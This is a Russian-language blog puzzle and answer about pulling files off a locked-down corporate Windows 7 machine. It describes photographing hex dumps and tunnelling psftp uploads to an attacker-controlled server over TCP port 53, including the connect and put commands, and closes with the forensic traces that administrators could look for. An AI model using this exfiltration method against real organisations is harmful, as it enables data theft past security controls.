Материал просмотрен 672 раз(а)

Как-то раз, один “хакер” Вася волей судьбы оказался за компьютером, некоторые файлы на котором его заинтересовали. И он решил во что бы то ни стало заполучить их.

hacker3

Описание системы

  • Итак, перед ним операционная система Windows 7 без установленных сервиспаков.
  • Имеется файловый менеджер Total Commander без каких-либо расширений.
  • Из средств защиты установлен Kaspersky Endpoint Security 10 версии. Настройки защищены паролем.
  • Запрещёна запись на USB-носители средствами “Контроль устройств”.
  • Запрещена работа с CD/DVD устройством тем же “Контролем устройств”.
  • Запрещены настройки в “Веб-контроле” для всех сайтов, кроме корпоративного.
  • В файрволле открыт 80, 443 порт только на корпоративный сайт.
  • Разрешён исходящий трафик 53/UDP и 53/TCP порты.
  • Запрещён исходящий трафик на 445/TCP порт.
  • Разрешены исходящие ICMP всех типов.
  • Запрещены все остальные исходящие TCP и UDP соединения.
  • Машина подключена к сети Интернет посредством WiFi. Пароль от точки доступа выдаётся на визитках.
  • Известен пароль от учётной записи пользователя. Прав администратора не имеется. Следовательно расшарить папку тоже не получится.
  • В офисе установлено видеонаблюдение, так что прямая кража накопителя исключается (так же как и слишком подозрительные манипуляции).
  • Корпоративный сайт доступен и извне и изнутри по тому же адресу.
  • Имеется возможность пронести на территорию предприятия как небольшой накопитель, так и нечто более умное, типа смартфона или нетбука.

Сперва предлагаю читателям написать примерные варианты сценария, как хакер “Вася” может попытаться утащить файлы. Можно привлекать дополнительные силы и средства, указать какие. Бюджет должен получиться не очень большим!

Ответ напишу в этом же посте через несколько единиц времени.


Ответ.

Итак, видимо подобный пост людей заинтересовал, что дополнительно навело меня на одну мысль о том, что можно будет сделать практическое задание на эту тему. Пока привожу разгадку.

Кстати, в комментариях один наш коллега очень интересно расписал подход и, надо сказать, фактически назвал правильный ответ.

Хакер Вася действительно утащил некоторое количество файлов. Двумя способами. Первый годится для мелких файлов, второй – универсальный, подошёл для крупных (> 100 Мб свободно).

Мелкие файлы

Вася воспользовался программой Total Commander, открыл мелкий файл для чтения и перешёл в hex-режим:

2016-10-29_16-01-12

Выбираем файл, нажимаем F3 (Просмотр). Затем выбираем “Вид – Шестнадцатиричный”.

Теперь банально фотаем дамп на смартфон, а в спокойной обстановке уже либо распознаём файл либо набиваем руками в какой-нибудь WinHEX. Сложность прямо пропорциональна размеру файла, но несколько килобайт таким способом утянуть вообще можно без проблем!

Крупные файлы

Но как быть с теми файлами, которые несколько крупнее? Была мысль открыть на смартфоне (Андроид) службу FTP, но поскольку смартфон у Васи оказался не рутованый, открыть порты младше 1025 не получалось. А исходящие TCP-соединения на высокие порты резались на уровне файрволла.

Внимание Васи привлёк пропускаемый TCP-порт под номером 53, что даёт службе DNS дополнительные фишки. Сисадмины редко каким-то образом дополнительно защищают DNS и как уже верно заметил один из комментаторов, через DNS можно вылить весьма немало данных. Правда Вася не стал задумываться о легитимизации трафика и сделал всё дешево и сердито.

На внешнем, подконтрольном Васе сервере к службе SSH помимо 22 порта был добавлен ещё и 53. Затем Вася посредством USB перенёс на компьютер небольшую утилитку psftp.exe (из того же семейства, что и PuTTy), благо чтение с USB-носителей разрешено. Утилитка весит 300+ кбайт, спрятать её в системе не составляет труда.

Затем в ней произвёлся коннект на подконтрольный Васе сервер:

open 123.456.789.10 53

(я нарочно завуалировал IP-адрес).

Подключение к серверу было организовано после авторизации.

lcd C:\путь к локальному каталогу, содержащему файлы
put имя_файла.zip

И всё! Файлы потекли в домашнюю директорию пользователя.

Скорость передачи была не очень высокая, порядка мегабайта в минуту, но это был зашифрованый трафик из защищённой сети!

Внимание, следующий вопрос: Как и что “спалил” Вася и что могли увидеть сисадмины этой сети? Жду комменты!


Резюмирую. Что могли запалить админы (но скорее всего не запалили) в этой ситуации?

  1. Прежде всего – факт подключения USB-накопителя, который отложится в журналах Windows и системном реестре. Оттуда можно вытащить VID/PID/Serial устройства, если оно ещё где-то всплывёт – можно связать это в общую картину.
  2. Факт запуска приложения psftp.exe, насколько я помню, откладывается в Prefetch и некоторых журналах. А так же вероятно, Касперский где-то запишет об активности программ.
  3. В момент слива – установленное исходящее соединение на <IP>:53. Характер соединения понять не удастся, всё-таки SSH. Вот эту ситуацию можно распутать конечно, что за IP и кто за ним стоит.
  4. Возможно остались следы передаваемых файлов. Тут лучше посмотреть созданные/удалённые файлы (особенно zip-архивы) за примерно этот период.

Но если инцидент сразу не обнаружился, потом найти следы этого подключения практически нереально!